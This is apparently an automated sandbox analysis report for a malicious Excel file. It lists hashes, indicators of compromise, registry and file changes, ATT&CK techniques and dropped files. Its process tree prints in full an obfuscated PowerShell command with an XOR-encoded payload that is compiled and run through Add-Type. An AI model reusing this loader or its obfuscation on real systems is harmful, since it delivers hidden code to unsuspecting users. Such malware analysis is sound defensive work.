8e949c67de4c95126b2244c251c5e892b49a908ba89b7fda6576850f95633f31

Analysis

max time kernel
31s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
15-05-2023 18:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5dce5ebf1cf7f254e96c8231e79272500726ea5682911251f63f01c26843c4d9.xls
Size

41KB
MD5

cdc246901f418d8168457a3683e7e372
SHA1

e70d86a4a546e8a16181dc950660d5a881d65eab
SHA256

5dce5ebf1cf7f254e96c8231e79272500726ea5682911251f63f01c26843c4d9
SHA512

047e9ea29891cd4f1adefd08afe71bb376d91759a9faeb9f6280c8b05ab9fdcc8a8e47df684e0ad514507d54885099b0dfc41426a7580f8e1f2ad3d587423c85
SSDEEP

768:cPjk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ0WYUFG+M7Ol:Ijk3hbdlylKsgqopeJBWhZFGkE+cL2Nq

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 15 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfh00A.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh010.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc00A.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc011.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh011.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc009.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh009.dat	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\PerfStringBackup.INI	OUTLOOK.EXE
File created	C:\Windows\system32\perfc010.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh007.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc00C.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh00C.dat	OUTLOOK.EXE
File created	C:\Windows\SysWOW64\PerfStringBackup.TMP	OUTLOOK.EXE
File created	C:\Windows\system32\perfc007.dat	OUTLOOK.EXE

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File opened for modification	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File created	C:\Windows\inf\Outlook\0009\outlperf.ini	OUTLOOK.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672D9-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672ED-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063007-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300C-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A5-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A0-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063022-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063007-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303B-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063072-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063096-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E6-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CB-0000-0000-C000-000000000046}\ = "_StorageItem"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D3-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C2-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063044-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063020-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304A-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D4-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D2-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E5-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063083-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C8-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309A-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EB-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F8-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303B-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E5-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063078-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063020-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063099-0000-0000-C000-000000000046}\ = "_CalendarView"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308C-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300E-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DB-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C9-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C4-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302A-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300C-0000-0000-C000-000000000046}\ = "_Results"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E6-0000-0000-C000-000000000046}\ = "OlkTextBoxEvents"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F8-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DC-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FA-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FB-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A7-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B1-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063072-0000-0000-C000-000000000046}\ = "_OutlookBarGroups"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303F-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A0-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F0-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E0-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303B-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C2-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C3-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063083-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304D-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063079-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063071-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006305B-0000-0000-C000-000000000046}\ = "FormRegionEvents"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309E-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1412	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1684	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeShutdownPrivilege	1680	OUTLOOK.EXE

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE
1680	OUTLOOK.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1412	EXCEL.EXE
1412	EXCEL.EXE
1412	EXCEL.EXE
1680	OUTLOOK.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1680 wrote to memory of 1684	1680	OUTLOOK.EXE	28
PID 1680 wrote to memory of 1684	1680	OUTLOOK.EXE	28
PID 1680 wrote to memory of 1684	1680	OUTLOOK.EXE	28
PID 1680 wrote to memory of 1684	1680	OUTLOOK.EXE	28
PID 1684 wrote to memory of 1916	1684	powershell.exe	31
PID 1684 wrote to memory of 1916	1684	powershell.exe	31
PID 1684 wrote to memory of 1916	1684	powershell.exe	31
PID 1684 wrote to memory of 1916	1684	powershell.exe	31
PID 1916 wrote to memory of 876	1916	csc.exe	32
PID 1916 wrote to memory of 876	1916	csc.exe	32
PID 1916 wrote to memory of 876	1916	csc.exe	32
PID 1916 wrote to memory of 876	1916	csc.exe	32

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5dce5ebf1cf7f254e96c8231e79272500726ea5682911251f63f01c26843c4d9.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1412

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1680
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function x57a37 {param($qd934)$a61889c='q4dbc';$s3ff43='';for ($i=0; $i -lt $qd934.length;$i+=2){$l86bd=[convert]::ToByte($qd934.Substring($i,2),16);$s3ff43+=[char]($l86bd -bxor $a61889c[($i/2)%$a61889c.length]);}return $s3ff43;}$w8914 = '04470d0c0451671d111714595f1710185a034230084710070e5f66110c171859014c2a1f4001100c0167011015185701115804470d0c0451671d111714594a260a10530a0d10055d07115804470d0c0451671d111714594a2b2c4a41170b0d1614371b100551094c2d14405f6f690141060e0a1214070e020247440d5748015351570a6f200e0f3859140d11051c460906035a010e50431648270d05461d320c185a105f4136511032111e57250607035117114158691417011d5d0742100555100b0051511c1606035a442b0d0564101043040151530642064c2b0d056410104310575657014718171611185a03420140525c0656580f3f260f1d7d09120c03404c400814460a070f4206464e261f40161b331e5d0a165e53780b03073d5d061002034d464b3e0141060e0a1214171602055d074206094001100d517d0a1633054644075a465507574b0240160b0d161409065513035c034a4a6f200e0f3859140d11051c460906035a010e50431648270d05461d320c185a105f41275d161616105834100c055107164158691417011d5d0742100555100b0051511c1606035a44000c1e58441450100257564b385a10321703141d50551701554e36385a10321703140e000115075c4e16185a104219490702074f1e41104216185a1042084451560352580f3f260f1d7d09120c03404c402814460a070f42064a060f1d1648270d05461d320c185a105f412340082f0c075129070e1e461d404f2251102e0202402110111e465904021d47014b3e024005160a1214011a1714460a42151e5d00420012555d0456597d0a16330546441356150250034f385a10321703141e035b445650064f185a10421b470d07514a4a4411000f185744111710400d0143185a104213460251034b584f2d0c17214016420248015d045e140d530300441c1c57541007534a414004515b5246040656074001515a5349164d4b5818524c035a440d02435e385a103217031a3e07111e1d1f2b0d056410104305515d57514405591756440501515159555d575a17181c57541007534a414204515b524604065153400651575310065453554003515053400554404a580f0d044b05515d57514405455f2a1f403416115f6e01100c584f312b0d05641010430b035653504c1c312b0d056410104a440f110b0d05141654071452005f534a5d024a1542555251575940015b564301554e19460655514f414c50524f1e411042114750010407581d1f201a05513f3f43140556505449091f521b420548521b175248521b480419592a1f4034161151595c5a054506055f2e1046170a021d1a250e0f1e572c250f1e56050e4b421d5f2f0203470c030f5f770b121a5951555051460c48524f1c0c5c0457435548514a4a5707035a17014c0c0606142d0c172140164a17140d515056401a300d2a1f4052564b581f541a534105064b4f1c0c5c0457435548514a4a49191f1005460d0c045150535706135259270d075d160d0d1c510a164d365110240c1d5001103310400c4a261f420d100c1f59010c175f67140700185508240c1d5001104d3044140e0a1255100b0c1f7005160258144f42412d6814545417505040435a141c57541007534a414452515352120453404a4a5a011543265106210f18510a164b581a200d141f580b0307375d08074b0901530350461c46535a450455525243055456014056500053420453530044505403571704065357440c55565347045252514452500353130400535444565000534004075305440654065241040157064403540357120452525a4405464b4f1503510701171d5f32111e570111102240051017385a020d4307010755524952590c06061434100c1251171130055516162a1f520b4a074601010005580f34100c125117114d22400510175942510154400c024b5803511017111f1454591e0141060e0a1214171602055d07421005460d0c04514c51550242034c1117035d0a05431255530756584f171611185a03420212065100554c16155607135746591005460d0c0451515d550212015940414a520b104b185a10420a4c045f420a4d57055506441a28070d16400c590a5a09564b18134d1007430401515306420659210c1f420110175f600b201a05514c01024651514c300456171611185a034a0a5d064d4e52471d5f075a46550757484c1c070a02031d4c175644050151512f5507505613023f4a0a5e064d470212065100555f78010c04055c394b580c46011616035a44075a46550757580c49';$w89142 = x57a37($w8914);Add-Type -TypeDefinition $w89142;[o495734]::p765a();
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rv4rtoi5.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42BD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC42BC.tmp"
      4⤵
      PID:876

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

Filesize
235KB

MD5
9018ef36dcdbb63856f40b0ea5844a70

SHA1
91d184994ffad134138589d0b0805400be616f23

SHA256
89fc9d88a57600da694a4d0101a19f89b4cec6bf5245b8537b803ef38c3e6178

SHA512
d4307bd4907636d498f46eb54832cd84b309a1985a8822a95e4b3a8dfb7183c595c999bea737d9d3bdb729d8d1daadc2edab8a70696a23946440ca669575af08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

Filesize
235KB

MD5
9018ef36dcdbb63856f40b0ea5844a70

SHA1
91d184994ffad134138589d0b0805400be616f23

SHA256
89fc9d88a57600da694a4d0101a19f89b4cec6bf5245b8537b803ef38c3e6178

SHA512
d4307bd4907636d498f46eb54832cd84b309a1985a8822a95e4b3a8dfb7183c595c999bea737d9d3bdb729d8d1daadc2edab8a70696a23946440ca669575af08

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES42BD.tmp

Filesize
1KB

MD5
527a0fb29182bbcf8e810fe4e144ed9a

SHA1
0f31faaa230bf448f4a3e1d6162e123324aef8fd

SHA256
51e3fc2866368872583985a24488acb9d6a23b50437d94a5ca20df232d3fea99

SHA512
e4ec5cd49a6a62e3fee60ceeea567958e32504345043c33ac92b65e42c78b096724f0c0d163898e2318271ccbc04d39e2e03f4de479d3fa422c51eee9ed08b85

Download Submit
C:\Users\Admin\AppData\Local\Temp\rv4rtoi5.dll

Filesize
5KB

MD5
ff5e2574b05114d206a4fbb54ae1e768

SHA1
57180321a9ce72e5aee8f3c0c5ba7277bcec5d86

SHA256
809228e5bfa55e005f28325cccf7595f82fd7bd3def1108ea5cf8638ad5d15d5

SHA512
79ac7eccb65d2917f24600757efb5b94af3dbed4cc7b07833b0db585d67fc307f78c27994ee2b72ef4ef09f22e112bb4d7f9f06596e36e99cc416199f1879f3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\rv4rtoi5.pdb

Filesize
11KB

MD5
1e0e8ae19c25cfe1f0de91fbc3995508

SHA1
b70dd0742a9df0e6a052681cddeaf3e1753859f0

SHA256
edd5398d99ecfc754fe9158909b38fcf6fffb1399196d345fddcbe03c229f580

SHA512
dc8d749e466a3209019b0e1f9faee9d2d0b120776f02c5df27c448f4213506aa1a4192a9c81c7aba82ce3d04dd6b16bda79fb673ec5065bbb0378c6754dbd73c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC42BC.tmp

Filesize
652B

MD5
6a8ffc6bb89be60b8b277ca64b5d2dcb

SHA1
e3bb633b02c26fac4907922de01b9ea324e12d11

SHA256
de5ab7d729cbc010c42bc1ed6df4f2ea2414288250bdc8a910f1b9b83e3f1ccd

SHA512
e86f22b83e999618e06d07a7af3d7f03a761c04d6b68cb7cd1edb7cb8095a36703e3e07dcf483952d2bd28ef6f4864305cb3f2d4bdee1307d9b01cadb5804059

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rv4rtoi5.0.cs

Filesize
1KB

MD5
181e1a122e7ba57fc99eabba7b90a31f

SHA1
a9b2be8a3460011f980c3210e784b32632c990db

SHA256
8145aa62d572e9497961d16c8328373d059ef93ffde902844a8deef57316a58e

SHA512
